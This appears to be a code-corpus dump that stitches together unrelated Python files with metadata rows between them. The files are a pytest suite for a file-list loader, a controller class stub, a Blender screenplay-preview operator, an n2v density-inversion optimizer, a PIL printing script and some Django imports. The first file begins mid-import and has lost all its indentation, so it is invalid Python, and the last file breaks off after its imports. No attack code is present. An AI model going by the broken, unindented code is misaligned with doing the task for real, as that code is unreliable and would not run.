is_csv_or_tsv_file_list,
load_plain_file_list,
load_csv_or_tsv_file_list,
to_absolute_file_list,
to_relative_file_list,
load_file_list,
save_plain_file_list,
save_csv_or_tsv_file_list,
save_file_list
)
FILE_1 = 'file1.pdf'
FILE_2 = 'file2.pdf'
UNICODE_FILE_1 = 'file1\u1234.pdf'
FILE_LIST = [FILE_1, FILE_2]
@pytest.fixture(name='load_plain_file_list_mock')
def _load_plain_file_list():
with patch.object(file_list_loader, 'load_plain_file_list') as mock:
yield mock
@pytest.fixture(name='load_csv_or_tsv_file_list_mock')
def _load_csv_or_tsv_file_list():
with patch.object(file_list_loader, 'load_csv_or_tsv_file_list') as mock:
yield mock
@pytest.fixture(name='to_absolute_file_list_mock')
def _to_absolute_file_list():
with patch.object(file_list_loader, 'to_absolute_file_list') as mock:
yield mock
class TestIsCsvOrTsvFileList:
def test_should_return_true_if_file_ext_is_csv(self):
assert is_csv_or_tsv_file_list('files.csv')
def test_should_return_true_if_file_ext_is_csv_gz(self):
assert is_csv_or_tsv_file_list('files.csv.gz')
def test_should_return_true_if_file_ext_is_tsv(self):
assert is_csv_or_tsv_file_list('files.tsv')
def test_should_return_true_if_file_ext_is_tsv_gz(self):
assert is_csv_or_tsv_file_list('files.tsv.gz')
def test_should_return_false_if_file_ext_is_lst(self):
assert not is_csv_or_tsv_file_list('files.lst')
def test_should_return_false_if_file_ext_is_lst_gz(self):
assert not is_csv_or_tsv_file_list('files.lst.gz')
class TestLoadPlainFileList:
def test_should_read_multiple_file_paths_from_file(self):
with NamedTemporaryFile('w') as f:
f.write('\n'.join([FILE_1, FILE_2]))
f.flush()
assert load_plain_file_list(f.name) == [FILE_1, FILE_2]
def test_should_read_unicode_file(self):
with NamedTemporaryFile('wb') as f:
f.write('\n'.join([UNICODE_FILE_1]).encode('utf-8'))
f.flush()
assert load_plain_file_list(f.name) == [UNICODE_FILE_1]
def test_should_apply_limit(self):
with NamedTemporaryFile('w') as f:
f.write('\n'.join([FILE_1, FILE_2]))
f.flush()
assert load_plain_file_list(f.name, limit=1) == [FILE_1]
class TestLoadCsvOrTsvFileList:
def test_should_read_multiple_file_paths_from_file_with_header_using_column_name(self):
with NamedTemporaryFile('w') as f:
f.write('\n'.join(['url', FILE_1, FILE_2]))
f.flush()
assert load_csv_or_tsv_file_list(f.name, 'url') == [FILE_1, FILE_2]
def test_should_read_multiple_file_paths_from_file_with_header_using_column_index(self):
with NamedTemporaryFile('w') as f:
f.write('\n'.join(['url', FILE_1, FILE_2]))
f.flush()
assert load_csv_or_tsv_file_list(f.name, 0) == [FILE_1, FILE_2]
def test_should_read_multiple_file_paths_from_file_without_header(self):
with NamedTemporaryFile('w') as f:
f.write('\n'.join([FILE_1, FILE_2]))
f.flush()
assert load_csv_or_tsv_file_list(f.name, 0, header=False) == [FILE_1, FILE_2]
def test_should_read_unicode_file(self):
with NamedTemporaryFile('wb') as f:
f.write('\n'.join(['url', UNICODE_FILE_1]).encode('utf-8'))
f.flush()
assert load_csv_or_tsv_file_list(f.name, 'url') == [UNICODE_FILE_1]
def test_should_raise_exception_if_column_name_is_invalid(self):
with pytest.raises(ValueError):
with NamedTemporaryFile('w') as f:
f.write('\n'.join(['url', FILE_1, FILE_2]))
f.flush()
assert load_csv_or_tsv_file_list(f.name, 'xyz') == [FILE_1, FILE_2]
def test_should_raise_exception_if_column_index_is_invalid(self):
with pytest.raises(IndexError):
with NamedTemporaryFile('w') as f:
f.write('\n'.join(['url', FILE_1, FILE_2]))
f.flush()
assert load_csv_or_tsv_file_list(f.name, 1) == [FILE_1, FILE_2]
def test_should_apply_limit(self):
with NamedTemporaryFile('w') as f:
f.write('\n'.join(['url', FILE_1, FILE_2]))
f.flush()
assert load_csv_or_tsv_file_list(f.name, 'url', limit=1) == [FILE_1]
class TestToAbsoluteFileList:
def test_should_make_path_absolute(self):
assert to_absolute_file_list('/base/path', ['sub/file1']) == ['/base/path/sub/file1']
def test_should_not_change_absolute_paths(self):
assert to_absolute_file_list('/base/path', ['/other/file1']) == ['/other/file1']
class TestToRelativeFileList:
def test_should_make_path_absolute(self):
assert to_relative_file_list('/base/path', ['/base/path/sub/file1']) == ['sub/file1']
def test_should_not_change_path_outside_base_path(self):
assert to_relative_file_list('/base/path', ['/other/file1']) == ['/other/file1']
@pytest.mark.usefixtures(
'load_plain_file_list_mock', 'load_csv_or_tsv_file_list_mock', 'to_absolute_file_list_mock'
)
class TestLoadFileList:
def test_should_call_load_plain_file_list(self, load_plain_file_list_mock):
result = load_file_list(
'file-list.lst', column='url', header=True, limit=1, to_absolute=False
)
load_plain_file_list_mock.assert_called_with('file-list.lst', limit=1)
assert result == load_plain_file_list_mock.return_value
def test_should_call_load_csv_or_tsv_file_list(self, load_csv_or_tsv_file_list_mock):
result = load_file_list(
'file-list.csv', column='url', header=True, limit=1, to_absolute=False
)
load_csv_or_tsv_file_list_mock.assert_called_with(
'file-list.csv', column='url', header=True, limit=1
)
assert result == load_csv_or_tsv_file_list_mock.return_value
def test_should_make_file_list_absolute(
self, load_plain_file_list_mock, to_absolute_file_list_mock):
result = load_file_list('/base/path/file-list.lst', column='url', to_absolute=True)
to_absolute_file_list_mock.assert_called_with(
'/base/path', load_plain_file_list_mock.return_value
)
assert result == to_absolute_file_list_mock.return_value
class TestSavePlainFileList:
def test_should_write_multiple_file_paths(self):
with TemporaryDirectory() as path:
file_list_path = os.path.join(path, 'out.lst')
save_plain_file_list(file_list_path, [FILE_1, FILE_2])
assert load_plain_file_list(file_list_path) == [FILE_1, FILE_2]
def test_should_write_unicode_file(self):
with TemporaryDirectory() as path:
file_list_path = os.path.join(path, 'out.lst')
save_plain_file_list(file_list_path, [UNICODE_FILE_1])
assert load_plain_file_list(file_list_path) == [UNICODE_FILE_1]
class TestSaveCsvOrTsvFileList:
def test_should_write_multiple_file_paths(self):
with TemporaryDirectory() as path:
file_list_path = os.path.join(path, 'out.csv')
save_csv_or_tsv_file_list(file_list_path, [FILE_1, FILE_2], column='url')
assert load_csv_or_tsv_file_list(file_list_path, column='url') == [FILE_1, FILE_2]
def test_should_write_unicode_file(self):
with TemporaryDirectory() as path:
file_list_path = os.path.join(path, 'out.lst')
save_csv_or_tsv_file_list(file_list_path, [UNICODE_FILE_1], column='url')
assert load_csv_or_tsv_file_list(file_list_path, column='url') == [UNICODE_FILE_1]
class TestSaveFileList:
def test_should_call_save_plain_file_list(self):
with patch.object(file_list_loader, 'save_plain_file_list') as mock:
save_file_list('file-list.lst', FILE_LIST, column='url', header=True)
mock.assert_called_with('file-list.lst', FILE_LIST)
def test_should_call_save_csv_or_tsv_file_list(self):
with patch.object(file_list_loader, 'save_csv_or_tsv_file_list') as mock:
save_file_list('file-list.csv', FILE_LIST, column='url', header=True)
mock.assert_called_with('file-list.csv', FILE_LIST, column='url', header=True)
| 39.657407 | 95 | 0.697175 |
c25eb9863d76a47e04a0349c62c58634066b728d | 344 | py | Python | _includes/code/algorithms/motor-controllers/sample-controller-class.py | xiaoxiae/Robotics-Simplified-Website | ab6c683695ecb758f746923bee3c2355ffbc76b9 | [
"MIT"
] | 3 | 2019-04-11T12:08:57.000Z | 2019-04-15T09:35:57.000Z | _includes/code/algorithms/motor-controllers/sample-controller-class.py | xiaoxiae/Robotics-Simplified-Website | ab6c683695ecb758f746923bee3c2355ffbc76b9 | [
"MIT"
] | null | null | null | _includes/code/algorithms/motor-controllers/sample-controller-class.py | xiaoxiae/Robotics-Simplified-Website | ab6c683695ecb758f746923bee3c2355ffbc76b9 | [
"MIT"
] | null | null | null | class SampleControllerClass:
"""Description of the class."""
def __init__(self, ...):
"""Creates a controller object."""
pass
def set_goal(self, goal):
"""Sets the goal of the controller."""
pass
def get_value(self):
"""Returns the current controller value"""
pass | 24.571429 | 51 | 0.555233 |
f3648aa474a0c222667afb4522d1faa64140865a | 9,993 | py | Python | operators/preview_fountain.py | b4zz4/Blender_Screenwriter | 41538dcb5881f12c9c06324d6a932c8b981eac3a | [
"MIT"
] | null | null | null | operators/preview_fountain.py | b4zz4/Blender_Screenwriter | 41538dcb5881f12c9c06324d6a932c8b981eac3a | [
"MIT"
] | null | null | null | operators/preview_fountain.py | b4zz4/Blender_Screenwriter | 41538dcb5881f12c9c06324d6a932c8b981eac3a | [
"MIT"
] | null | null | null | import bpy, textwrap, os, sys
from .. import fountain
from pathlib import Path
class SCREENWRITER_OT_preview_fountain(bpy.types.Operator):
'''Updates the preview'''
bl_idname = "scene.preview_fountain"
bl_label = "Refresh"
@classmethod
def poll(cls, context):
space = bpy.context.space_data
try:
filepath = space.text.name
#filepath = bpy.context.area.spaces.active.text.filepath
if filepath.strip() == "": return False
return ((space.type == 'TEXT_EDITOR')
and Path(filepath).suffix == ".fountain")
except AttributeError: return False
def execute(self, context):
space = bpy.context.space_data
dir = os.path.dirname(bpy.data.filepath)
if not dir in sys.path:
sys.path.append(dir)
filename = "Preview.txt"
if filename not in bpy.data.texts:
bpy.data.texts.new(filename) # New document in Text Editor
else:
bpy.data.texts[filename].clear() # Clear existing text
#current_text = os.path.basename(bpy.context.space_data.text.filepath)
current_text = bpy.context.space_data.text.name
if current_text.strip() == "": return
fountain_script = bpy.context.area.spaces.active.text.as_string()
if fountain_script.strip() == "": return {"CANCELLED"}
F = fountain.Fountain(fountain_script)
# Get number of header lines
contents = fountain_script.strip().replace('\r', '')
contents_has_metadata = ':' in contents.splitlines()[0]
contents_has_body = '\n\n' in contents
if contents_has_metadata and contents_has_body:
lines = fountain_script.split('\n\n')
lines = lines[0].splitlines()
current_line = bpy.data.texts[current_text].current_line_index - len(lines) - 1
else:
current_line = bpy.data.texts[current_text].current_line_index
bpy.context.scene.title_page_index = current_line
# Layout
current_character = bpy.data.texts[current_text].current_character
jump_to_line = 0
margin = " " * 4
document_width = 60 + len(margin)
document_height = 56
action_wrapper = textwrap.TextWrapper(width=document_width)
dialogue_wrapper = textwrap.TextWrapper(width=37 + int(len(margin) / 2))
dialogue_indentation = 13 + int(len(margin) / 2)
cursor_indentation = margin
add_characters = current_character
cursor_indentation_actual = ""
text = bpy.context.area.spaces.active.text
current_line_length = len(text.current_line.body)
add_characters_actual = 0
end_line_title = ""
end_line_nr = 0
contact_indent = ""#" "*35
# Add a Title Page
if contents_has_metadata:
# add title
for meta in iter(F.metadata.items()):
if meta[0] == 'title':
# blank lines
for l in range(int(document_height/2.5)-len(meta[1])):
bpy.data.texts[filename].write(chr(10))
# title
for i in meta[1]:
bpy.data.texts[filename].write(margin+((str(i)).center(document_width)+chr(10)))
end_line_title = str(i)
end_line_nr = bpy.data.texts[filename].current_line_index
# add credit
elif meta[0] == 'credit' or meta[0] == 'credits':
for i in meta[1]:
bpy.data.texts[filename].write(chr(10)+margin+(str(i).center(document_width)+chr(10)+chr(10)))
end_line_title = str(i)
end_line_nr = bpy.data.texts[filename].current_line_index
# get author
elif meta[0] == 'author' or meta[0] == 'authors':
for i in meta[1]:
bpy.data.texts[filename].write(margin+(str(i).center(document_width)+chr(10)+chr(10)))
end_line_title = str(i)
end_line_nr = bpy.data.texts[filename].current_line_index
# get source
elif meta[0] == 'source':
for i in meta[1]:
bpy.data.texts[filename].write(chr(10)+margin+(str(i).center(document_width)+chr(10)))
end_line_title = str(i)
end_line_nr = bpy.data.texts[filename].current_line_index
# get date
elif meta[0] == 'draft date' or meta[0] == 'date':
for i in meta[1]:
bpy.data.texts[filename].write(contact_indent+margin+(str(i)+chr(10)))
# get contact
elif meta[0] == 'contact':
for i in meta[1]:
bpy.data.texts[filename].write(contact_indent+margin+(str(i)+chr(10)))
# get notes
elif meta[0] == 'notes':
for i in meta[1]:
bpy.data.texts[filename].write(contact_indent+margin+(str(i)+chr(10)))
# get copyright
elif meta[0] == 'copyright':
for i in meta[1]:
bpy.data.texts[filename].write(contact_indent+margin+(str(i)+chr(10)))
# insert blank lines after title
if end_line_title != 0:
cli = bpy.data.texts[filename].current_line_index
blank_lines = ""
for l in range(document_height - cli-2):
blank_lines = blank_lines + chr(10)
txt = bpy.data.texts[filename].as_string()
text = txt.replace(end_line_title, end_line_title+blank_lines)
bpy.data.texts[filename].clear()
bpy.data.texts[filename].write(text)
# add pagebreak
bpy.data.texts[filename].write(chr(10) + margin + ("_" * document_width) + chr(10))
for fc, f in enumerate(F.elements):
add_characters = current_character
if f.element_type == 'Scene Heading':
if str(f.scene_number) != "": f.scene_number = f.scene_number+ " "
bpy.data.texts[filename].write(
margin + f.scene_number+ f.scene_abbreviation.upper() + " " + f.element_text.upper() + chr(10))
cursor_indentation = margin
elif f.element_type == 'Action' and f.is_centered == False:
action = f.element_text
action_list = action_wrapper.wrap(text=action)
add_action_lines = 0
for action in action_list:
bpy.data.texts[filename].write(margin + action + chr(10))
cursor_indentation = margin
elif f.element_type == 'Action' and f.is_centered == True:
bpy.data.texts[filename].write(
margin + f.element_text.center(document_width) + chr(10))
cursor_indentation = margin + ("_" * (int(
(document_width / 2 - len(f.element_text) / 2)) - 2))
elif f.element_type == 'Character':
bpy.data.texts[filename].write(
margin + f.element_text.center(document_width).upper() +
chr(10))
cursor_indentation = margin + ("_" * ((f.element_text.center(
document_width)).find(f.element_text)))
elif f.element_type == 'Parenthetical':
bpy.data.texts[filename].write(
margin + f.element_text.center(document_width).lower() +
chr(10))
cursor_indentation = margin + ("_" * int(
(document_width / 2 - len(f.element_text) / 2)))
elif f.element_type == 'Dialogue':
dialogue = f.element_text
current_character
line_list = dialogue_wrapper.wrap(text=dialogue)
for dialogue in line_list:
bpy.data.texts[filename].write(margin + (
" " * dialogue_indentation + dialogue) + chr(10))
cursor_indentation = margin + (" " * dialogue_indentation)
elif f.element_type == 'Page Break':
bpy.data.texts[filename].write(
chr(10) + margin + ("_" * document_width) + chr(10))
# # not for preview
# elif f.element_type == 'Boneyard': # Ignored by Fountain formatting
# bpy.data.texts[filename].write(chr(10))
# elif f.element_type == 'Comment': # Ignored by Fountain formatting
# bpy.data.texts[filename].write(chr(10))
# elif f.element_type == 'Section Heading': # Ignored by Fountain formatting
# bpy.data.texts[filename].write(chr(10))
# elif f.element_type == 'Synopsis': # Ignored by Fountain formatting
# bpy.data.texts[filename].write(chr(10))
elif f.element_type == 'Transition':
bpy.data.texts[filename].write(
margin + f.element_text.rjust(document_width).upper() + chr(10))
cursor_indentation = margin + ("_" * (
document_width - len(f.element_text)))
elif f.element_type == 'Empty Line':
bpy.data.texts[filename].write(chr(10))
if current_line >= f.original_line and f.original_line != 0:
jump_to_line = bpy.data.texts[filename].current_line_index
cursor_indentation_actual = cursor_indentation
line = jump_to_line - 1
if line < 0: line = 0
bpy.data.texts[filename].current_line_index = line
cur = current_character + len(cursor_indentation_actual)
bpy.data.texts[filename].select_set(line, cur, line, cur)
return {"FINISHED"}
| 46.050691 | 118 | 0.550085 |
921f01e72586d12ccad9c482023901e328161e14 | 638 | py | Python | qu/data/__init__.py | aarpon/qu | a842b25052e9e054beb4d4dcbd529b89de2ccbd6 | [
"Apache-2.0"
] | 6 | 2021-01-26T16:32:54.000Z | 2022-01-18T15:34:13.000Z | qu/data/__init__.py | ciskoh/qu | a9f6903c34f9d21d632521f3e1eca763940c7711 | [
"Apache-2.0"
] | 2 | 2022-01-27T09:32:33.000Z | 2022-01-27T19:43:02.000Z | qu/data/__init__.py | ciskoh/qu | a9f6903c34f9d21d632521f3e1eca763940c7711 | [
"Apache-2.0"
] | 1 | 2021-01-26T16:32:56.000Z | 2021-01-26T16:32:56.000Z | # /********************************************************************************
# * Copyright © 2020-2021, ETH Zurich, D-BSSE, Aaron Ponti
# * All rights reserved. This program and the accompanying materials
# * are made available under the terms of the Apache License Version 2.0
# * which accompanies this distribution, and is available at
# * https://www.apache.org/licenses/LICENSE-2.0.txt
# *
# * Contributors:
# * Aaron Ponti - initial API and implementation
# *******************************************************************************/
#
from .manager import DataManager, MaskType, ExperimentType
| 45.571429 | 85 | 0.526646 |
bca741a3bab4301f33747aa80bf11b305149d1a7 | 2,404 | py | Python | Site_Visit_2.0/venv/bin/pilprint.py | opacichjj/FEMA-PDA-and-Route-Optimizer | d79468438f45216d5abeef5f5037d6a165f61140 | [
"MIT"
] | null | null | null | Site_Visit_2.0/venv/bin/pilprint.py | opacichjj/FEMA-PDA-and-Route-Optimizer | d79468438f45216d5abeef5f5037d6a165f61140 | [
"MIT"
] | null | null | null | Site_Visit_2.0/venv/bin/pilprint.py | opacichjj/FEMA-PDA-and-Route-Optimizer | d79468438f45216d5abeef5f5037d6a165f61140 | [
"MIT"
] | 2 | 2019-08-11T03:34:07.000Z | 2019-10-25T16:57:48.000Z | #!/Users/JO/Desktop/microblog/venv/bin/python3
#
# The Python Imaging Library.
# $Id$
#
# print image files to postscript printer
#
# History:
# 0.1 1996-04-20 fl Created
# 0.2 1996-10-04 fl Use draft mode when converting.
# 0.3 2003-05-06 fl Fixed a typo or two.
#
from __future__ import print_function
VERSION = "pilprint 0.3/2003-05-05"
from PIL import Image
from PIL import PSDraw
letter = ( 1.0*72, 1.0*72, 7.5*72, 10.0*72 )
def description(file, image):
import os
title = os.path.splitext(os.path.split(file)[1])[0]
format = " (%dx%d "
if image.format:
format = " (" + image.format + " %dx%d "
return title + format % image.size + image.mode + ")"
import getopt, os, sys
if len(sys.argv) == 1:
print("PIL Print 0.2a1/96-10-04 -- print image files")
print("Usage: pilprint files...")
print("Options:")
print(" -c colour printer (default is monochrome)")
print(" -p print via lpr (default is stdout)")
print(" -P <printer> same as -p but use given printer")
sys.exit(1)
try:
opt, argv = getopt.getopt(sys.argv[1:], "cdpP:")
except getopt.error as v:
print(v)
sys.exit(1)
printer = None # print to stdout
monochrome = 1 # reduce file size for most common case
for o, a in opt:
if o == "-d":
# debug: show available drivers
Image.init()
print(Image.ID)
sys.exit(1)
elif o == "-c":
# colour printer
monochrome = 0
elif o == "-p":
# default printer channel
printer = "lpr"
elif o == "-P":
# printer channel
printer = "lpr -P%s" % a
for file in argv:
try:
im = Image.open(file)
title = description(file, im)
if monochrome and im.mode not in ["1", "L"]:
im.draft("L", im.size)
im = im.convert("L")
if printer:
fp = os.popen(printer, "w")
else:
fp = sys.stdout
ps = PSDraw.PSDraw(fp)
ps.begin_document()
ps.setfont("Helvetica-Narrow-Bold", 18)
ps.text((letter[0], letter[3]+24), title)
ps.setfont("Helvetica-Narrow-Bold", 8)
ps.text((letter[0], letter[1]-30), VERSION)
ps.image(letter, im)
ps.end_document()
except:
print("cannot print image", end=' ')
print("(%s:%s)" % (sys.exc_info()[0], sys.exc_info()[1]))
| 25.041667 | 67 | 0.56406 |
80a8b0bf822b23e8c65dd21801417d37c5b45670 | 11,956 | py | Python | n2v/methods/pdeco.py | ymshi449/n2v | 9427d97fed9daf303291b4fd9c533ee15b072710 | [
"BSD-3-Clause"
] | null | null | null | n2v/methods/pdeco.py | ymshi449/n2v | 9427d97fed9daf303291b4fd9c533ee15b072710 | [
"BSD-3-Clause"
] | null | null | null | n2v/methods/pdeco.py | ymshi449/n2v | 9427d97fed9daf303291b4fd9c533ee15b072710 | [
"BSD-3-Clause"
] | 1 | 2022-03-09T22:16:25.000Z | 2022-03-09T22:16:25.000Z | """
pdeco.py
Functions associated with PDE-Constrained Optimization.
"""
import numpy as np
from opt_einsum import contract
from scipy.optimize import minimize
from psi4.core import BasisSet as psi4_basiset
from psi4.core import MintsHelper as psi4_mintshelper
class PDECO():
"""
Performs Optimization as in: 10.1063/1.1535422 - Qin Wu + Weitao Yang
Attributes:
-----------
lambda_rgl: {None, float}. If float, lambda-regularization is added with lambda=lambda_rgl.
"""
regul_norm = None # Regularization norm: ||v||^2
lambda_reg = None # Regularization constant
def pdeco(self, opt_max_iter, reg=None, gtol=1e-3,
opt_method='L-BFGS-B', opt=None):
"""
Calls scipy minimizer to minimize lagrangian.
"""
self.lambda_reg = reg
self.lambda_reg = reg
if opt is None:
opt = {"disp": False}
opt['maxiter'] = opt_max_iter
opt['gtol'] = gtol
# Initialization for D and C
self._diagonalize_with_potential_pbs(self.v_pbs)
if self.S4 is None:
self.S4 = self.fouroverlap()
if opt_method.lower() == 'bfgs' or opt_method.lower() == 'l-bfgs-b':
opt_results = minimize( fun = self.lagrangian_pbeco,
x0 = self.v_pbs,
jac = self.gradient_pbeco,
method = opt_method,
options = opt
)
else:
raise ValueError(F'{opt_method} is not supported. Only BFGS '
F'and L-BFGS is supported.')
if opt_results.success == False:
self.v_pbs = opt_results.x
self.opt_info = opt_results
raise ValueError("Optimization was unsucessful (|grad|=%.2e) within %i iterations, "
"try a different initial guess. %s"% (np.linalg.norm(opt_results.jac), opt_results.nit, opt_results.message)
)
else:
print(f"Optimization Successful within {opt_results.nit} iterations! |grad|={np.linalg.norm(opt_results.jac):.2e}." )
self.v_pbs = opt_results.x
self.opt_info = opt_results
def fouroverlap(self, wfn=None):
"""
Calculates four overlap integral with Density Fitting method.
S4_{ijkl} = \int dr \phi_i(r)*\phi_j(r)*\phi_k(r)*\phi_l(r)
Parameters
----------
wfn: psi4.core.Wavefunction
Wavefunction object of molecule
Return
------
S4
"""
if wfn is None:
wfn = self.wfn
print(f"4-AO-Overlap tensor will take about {self.nbf **4 / 8 * 1e-9:d} GB.")
mints = psi4_mintshelper( self.basis )
aux_basis = psi4_basiset.build(wfn.molecule(), "DF_BASIS_SCF", "",
"JKFIT", wfn.basisset().name())
S_Pmn = np.squeeze(mints.ao_3coverlap(aux_basis, wfn.basisset(),
wfn.basisset()))
S_PQ = np.array(mints.ao_overlap(aux_basis, aux_basis))
S_PQinv = np.linalg.pinv(S_PQ, rcond=1e-9)
S4 = np.einsum('Pmn,PQ,Qrs->mnrs', S_Pmn, S_PQinv, S_Pmn, optimize=True)
return S4
def lagrangian_pbeco(self, v):
"""
Lagrangian to be minimized wrt external potential
Equation (5) of main reference
"""
# If v is not updated, will not re-calculate.
if not np.allclose(v, self.v_pbs, atol=1e-15):
self._diagonalize_with_potential_pbs(v)
# self._diagonalize_with_potential_pbs(v)
if self.ref == 1:
L = 4 * contract("ijkl,ij,kl", self.S4, self.Da - self.Dt[0], self.Da- self.Dt[0])
else:
L = contract("ijkl,ij,kl", self.S4, self.Da+self.Db-self.Dt[0]-self.Dt[1], self.Da+self.Db-self.Dt[0]-self.Dt[1])
# Add lambda-regularization
if self.lambda_reg is not None:
T = self.T_pbs
if self.ref == 1:
norm = 2 * (v[:self.npbs] @ T @ v[:self.npbs])
else:
norm = (v[self.npbs:] @ T @ v[self.npbs:]) + (v[:self.npbs] @ T @ v[:self.npbs])
L += norm * self.lambda_reg
self.regul_norm = norm
return L
def gradient_pbeco(self, v):
"""
Calculates gradient wrt target density
Equation (11) of main reference
"""
# If v is not updated, will not re-calculate.
if not np.allclose(v, self.v_pbs, atol=1e-15):
self._diagonalize_with_potential_pbs(v)
if self.ref == 1:
grad_temp = np.zeros((self.nbf, self.nbf))
g = 8 * contract("ijkl,ij,km->lm", self.S4, 2 * (self.Dt[0] - self.Da), self.Coca) # shape (ao, mo)
u = 0.5 * contract("lm,lm->m", self.Coca, g) # shape (mo, )
g -= 2 * contract('m,ij,jm->im', u, self.S2, self.Coca) # shape (ao, mo)
for idx in range(self.nalpha):
LHS = self.Fock - self.S2 * self.eigvecs_a[idx]
p_i = np.linalg.solve(LHS, g[:, idx])
# Gram–Schmidt rotation
p_i -= np.sum(p_i * np.dot(self.S2, self.Coca[:,idx])) * self.Coca[:,idx]
assert np.allclose([np.sum(p_i * (self.S2 @ self.Coca[:,idx])), np.linalg.norm(np.dot(LHS,p_i)-g[:, idx]), np.sum(g[:, idx]*self.Coca[:,idx])], 0, atol=1e-4)
grad_temp += p_i[:, np.newaxis] * self.Coca[:,idx]
self.grad = contract("ij,ijk->k", grad_temp, self.S3)
else:
grad_temp_a = np.zeros((self.nbf, self.nbf))
g_a = 4 * contract("ijkl,ij,km->lm", self.S4, (self.Dt[0] - self.Da) + (self.Dt[1] - self.Db), self.Coca) # shape (ao, mo)
u_a = 0.5 * contract("lm,lm->m", self.Coca, g_a) # shape (mo, )
g_a -= 2 * contract('m,ij,jm->im', u_a, self.S2, self.Coca) # shape (ao, mo)
for idx in range(self.nalpha):
LHS = self.Fock[0] - self.S2 * self.eigvecs_a[idx]
p_i = np.linalg.solve(LHS, g_a[:, idx])
# Gram–Schmidt rotation
p_i -= np.sum(p_i * np.dot(self.S2, self.Coca[:,idx])) * self.Coca[:,idx]
assert np.allclose([np.sum(p_i * (self.S2 @ self.Coca[:,idx])), np.linalg.norm(np.dot(LHS,p_i)-g_a[:, idx]), np.sum(g_a[:, idx]*self.Coca[:,idx])], 0, atol=1e-4)
grad_temp_a += p_i[:, np.newaxis] * self.Coca[:,idx]
grad_temp_b = np.zeros((self.nbf, self.nbf))
g_b = 4 * contract("ijkl,ij,km->lm", self.S4, (self.Dt[0] - self.Da) + (self.Dt[1] - self.Db), self.Cocb) # shape (ao, mo)
u_b = 0.5 * contract("lm,lm->m", self.Cocb, g_b) # shape (mo, )
g_b -= 2 * contract('m,ij,jm->im', u_b, self.S2, self.Cocb) # shape (ao, mo)
for idx in range(self.nbeta):
LHS = self.Fock[1] - self.S2 * self.eigvecs_b[idx]
p_i = np.linalg.solve(LHS, g_b[:, idx])
# Gram–Schmidt rotation
p_i -= np.sum(p_i * np.dot(self.S2, self.Cocb[:,idx])) * self.Cocb[:,idx]
assert np.allclose([np.sum(p_i * (self.S2 @ self.Cocb[:,idx])), np.linalg.norm(np.dot(LHS,p_i)-g_b[:, idx]), np.sum(g_b[:, idx]*self.Cocb[:,idx])], 0, atol=1e-4)
grad_temp_b += p_i[:, np.newaxis] * self.Cocb[:,idx]
self.grad = np.concatenate((contract("ij,ijk->k", grad_temp_a, self.S3), contract("ij,ijk->k", grad_temp_b, self.S3)))
if self.lambda_reg is not None:
T = self.T_pbs
if self.ref == 1:
rgl_vector = 4 * self.lambda_reg*np.dot(T, v[:self.npbs])
self.grad += rgl_vector
else:
self.grad[:self.npbs] += 2 * self.lambda_reg*np.dot(T, v[:self.npbs])
self.grad[self.npbs:] += 2 * self.lambda_reg*np.dot(T, v[self.npbs:])
return self.grad
def find_regularization_constant_pdeco(self, opt_max_iter, opt_method="L-BFGS-B", gtol=1e-3,
opt=None, lambda_list=None):
"""
Finding regularization constant lambda.
Note: it is recommend to set a specific convergence criteria by opt or tol,
in order to control the same convergence
for different lambda value.
After the calculation is done, one can plot the returns to select a good lambda.
Parameters:
-----------
guide_potential_components: a list of string
the components for guide potential v_pbs.
see Inverter.generate_components() for details.
opt_method: string default: "trust-krylov"
opt_methods available in scipy.optimize.minimize
tol: float
Tolerance for termination. See scipy.optimize.minimize for details.
opt: dictionary, optional
if given:
scipy.optimize.minimize(method=opt_method, options=opt)
lambda_list: np.ndarray, optional
A array of lambda to search; otherwise, it will be 10 ** np.linspace(-1, -7, 7).
Returns:
--------
lambda_list: np.ndarray
A array of lambda searched.
P_list: np.ndarray
The value defined by [Bulat, Heaton-Burgess, Cohen, Yang 2007] eqn (21).
Corresponding to lambda in lambda_list.
error_list: np.ndarray
The Ts value for each lambda.
"""
error_list = []
v_norm_list = []
if lambda_list is None:
lambda_list = 10 ** np.linspace(-3, -9, 7)
if opt is None:
opt = {"disp" : False}
opt['maxiter'] = opt_max_iter
opt['gtol'] = gtol
self.lambda_reg = None
# Initial calculation with no regularization
# Initialization for D and C
self._diagonalize_with_potential_pbs(self.v_pbs)
if opt_method.lower() == 'bfgs' or opt_method.lower() == 'l-bfgs-b':
initial_result = minimize(fun=self.lagrangian_pbeco,
x0=self.v_pbs,
jac=self.gradient_pbeco,
method=opt_method,
options=opt
)
else:
raise ValueError(F'{opt_method} is not supported. Only BFGS '
F'and L-BFGS is supported.')
if initial_result.success == False:
raise ValueError("Optimization was unsucessful (|grad|=%.2e) within %i iterations, "
"try a different intitial guess"% (np.linalg.norm(initial_result.jac), initial_result.nit)
+ initial_result.message)
else:
error0 = -initial_result.fun
initial_v_pbs = initial_result.x # This is used as the initial guess for with regularization calculation.
for reg in lambda_list:
self.lambda_reg = reg
if opt_method.lower() == 'bfgs' or opt_method.lower() == 'l-bfgs-b':
opt_results = minimize(fun=self.lagrangian_pbeco,
x0=initial_v_pbs,
jac=self.gradient_pbeco,
method=opt_method,
options=opt
)
else:
raise ValueError(F'{opt_method} is not supported. Only BFGS '
F'and L-BFGS is supported.')
v_norm_list.append(self.regul_norm)
error_list.append(opt_results.fun - self.lambda_reg * self.regul_norm)
P_list = lambda_list * np.array(v_norm_list) / (np.array(error_list) - error0)
return lambda_list, P_list, np.array(error_list)
| 41.370242 | 177 | 0.536467 |
c64312ddb70ba8f8ce87635a4cfec0eb6299ba71 | 6,658 | py | Python | exporter/applications/views/documents.py | django-doctor/lite-frontend | 330ff9575fd22d7c4c42698ac2d653244e6180d6 | [
"MIT"
] | null | null | null | exporter/applications/views/documents.py | django-doctor/lite-frontend | 330ff9575fd22d7c4c42698ac2d653244e6180d6 | [
"MIT"
] | null | null | null | exporter/applications/views/documents.py | django-doctor/lite-frontend | 330ff9575fd22d7c4c42698ac2d653244e6180d6 | [
"MIT"
] | null | null | null | import logging
from http import HTTPStatus
from inspect import signature
from django.conf import settings
from django.shortcuts import redirect
from django.urls import reverse, NoReverseMatch
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import TemplateView
from s3chunkuploader.file_handler import s3_client, S3FileUploadHandler
from caseworker.cases.services import get_document
from exporter.applications.forms.documents import attach_document_form, delete_document_confirmation_form
from exporter.applications.helpers.check_your_answers import is_application_export_type_permanent
from exporter.applications.helpers.reverse_documents import document_switch
from exporter.applications.services import add_document_data, download_document_from_s3, get_application
from lite_content.lite_exporter_frontend import strings
from lite_forms.generators import form_page, error_page
from core.auth.views import LoginRequiredMixin
